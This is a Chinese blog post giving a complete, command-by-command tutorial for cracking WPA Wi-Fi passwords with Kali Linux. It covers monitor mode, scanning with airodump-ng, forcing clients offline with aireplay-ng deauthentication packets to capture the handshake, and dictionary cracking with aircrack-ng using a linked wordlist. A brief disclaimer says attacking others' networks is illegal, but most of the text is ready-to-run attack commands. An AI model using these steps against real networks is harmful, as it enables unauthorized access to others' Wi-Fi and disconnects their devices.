kali破解wifi密码

开始

1、选择合适的网卡,有些网卡kali识别不了,我用的网卡信息

2、网卡开启监听模式

 3、查看监听模式是否开启成功(网卡名称变成wlan0mon说明已经开启成功)

 4、输入“airodump-ng wlan0mon”,扫描附近热点信息,找到自己想要破解的热点名称后按下ctrl+c停止扫描(NEM-AL10是我自己用手机开启的热点,破解他人无线密码是违法的,自己搭个热点玩玩就行)

 5、抓取握手包。命令格式“airodump-ng -c {CH} --bssid {BSSID} -w {要保存握手包的目录}”输入:airodump-ng -c 11 --bssid 3C:FA:43:7E:57:48 -w /home/ wlan0mon,当抓到握手包的时候箭头处会显示”handshake“字样

 

 6、可以看到现在抓不到握手包,是因为没有客户端与AP进行连接。但是我们看到了一个已连接的热点,我们发送反认证包,让其下线,然后改客户端会重新尝试连接热点,然后我们就可以抓到握手包了。

新开一个终端窗口,命令格式为:aireplay-ng -0 {发送反认证包的个数} -a {BSSID} -c {强制下线的MAC地址(STATION下面的地址)} 无线网卡名称

输入“aireplay-ng -0 10 -a 3C:FA:43:7E:57:48 -c 30:10:B3:DC:9F:75 wlan0mon”,系统会下线,然后重新连接,然后我们就可以抓到握手包了。

 

 7、按下ctrl+c停止抓包。进到/home目录下查看握手包,其中"-01.cap"是我们一会儿破解要用到的数据包

 

 8、使用aircrack-ng进行破解。命令格式:aircrack-ng -w {本地的字典文件(破解的关键)} {握手包}

输入"aircrack-ng -w top3000.txt /home/-01.cap",由于握手包命名的特殊性,这里只能使用绝对路径,可以改个名字就可以使用相对路径了

字典网上有好多,这个是github上的:https://github.com/conwnet/wpa-dictionary

 结语:

破解的原理还是一个一个试,之所以要抓握手包,是因为握手包中含有经过加密的密码,我们将握手包抓下来后,可以在本地跑字典破解,并且每秒钟可以试几万个密码,但是如果没有握手包,我们只能手动输密码,那样是很慢的,即使可以用程序来跑,也不能保证路由器没有设置错误次数,有可能会禁止连接,即使没有设置错误次数,但是每次与路由器交互的过程所需要耗费的时间也大于一秒。

 

posted @ 2019-09-21 11:10  fzga  阅读(21057)  评论(0编辑  收藏  举报